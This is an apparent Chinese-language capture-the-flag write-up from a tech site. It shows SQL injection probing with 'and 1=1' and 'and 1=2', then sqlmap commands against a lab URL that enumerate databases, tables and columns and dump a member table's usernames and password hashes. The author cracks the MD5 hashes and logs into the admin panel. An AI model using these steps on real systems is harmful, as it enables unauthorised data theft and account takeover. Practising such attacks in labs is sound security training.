溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

sqlmap注入的示例分析

發(fā)布時間:2021-08-12 09:23:39 來源:億速云 閱讀:104 作者:小新 欄目:開發(fā)技術(shù)

這篇文章主要介紹sqlmap注入的示例分析,文中介紹的非常詳細(xì),具有一定的參考價值,感興趣的小伙伴們一定要看完!

1.發(fā)現(xiàn)此網(wǎng)址可能存在sql注入漏洞,我們進(jìn)行sql盲注入測試一下是否存在漏洞。

地址欄輸入 and 1=1 發(fā)現(xiàn)頁面正常顯示。

sqlmap注入的示例分析

再次輸入and 1=2 頁面出現(xiàn)錯誤,說明該頁面可能存在sql注入漏洞

sqlmap注入的示例分析

2.現(xiàn)在拿出我們的kali工具,sqlmap進(jìn)行注入測試。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs

sqlmap注入的示例分析

3.可以看到存在注入漏洞,掃到了5個數(shù)據(jù)庫。要獲取管理員用戶密碼,我們可以先從stormgroup注入。查看stormgroup這個數(shù)據(jù)庫存在的表單

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables

sqlmap注入的示例分析

4.接下來查一下member中存在哪些列。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -T member --columns

sqlmap注入的示例分析

5.上一步可以看到,name,password 是不是很熟悉。ok接下來我們開始獲取這兩列的數(shù)據(jù)。

sqlmap注入的示例分析

sqlmap注入的示例分析

6.可以看到password是經(jīng)過md5加密,接下來我們把他解密。這里推薦給大家我自己收集的多種解密網(wǎng)址:解密網(wǎng)址大全點擊這里

sqlmap注入的示例分析

7.now! 密碼已經(jīng)呈現(xiàn)在我們眼前!?。?!找到后臺地址進(jìn)行登錄。

sqlmap注入的示例分析

8.END 登錄成功,拿到flag,提交。Gameover !

以上是“sqlmap注入的示例分析”這篇文章的所有內(nèi)容,感謝各位的閱讀!希望分享的內(nèi)容對大家有幫助,更多相關(guān)知識,歡迎關(guān)注億速云行業(yè)資訊頻道!

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI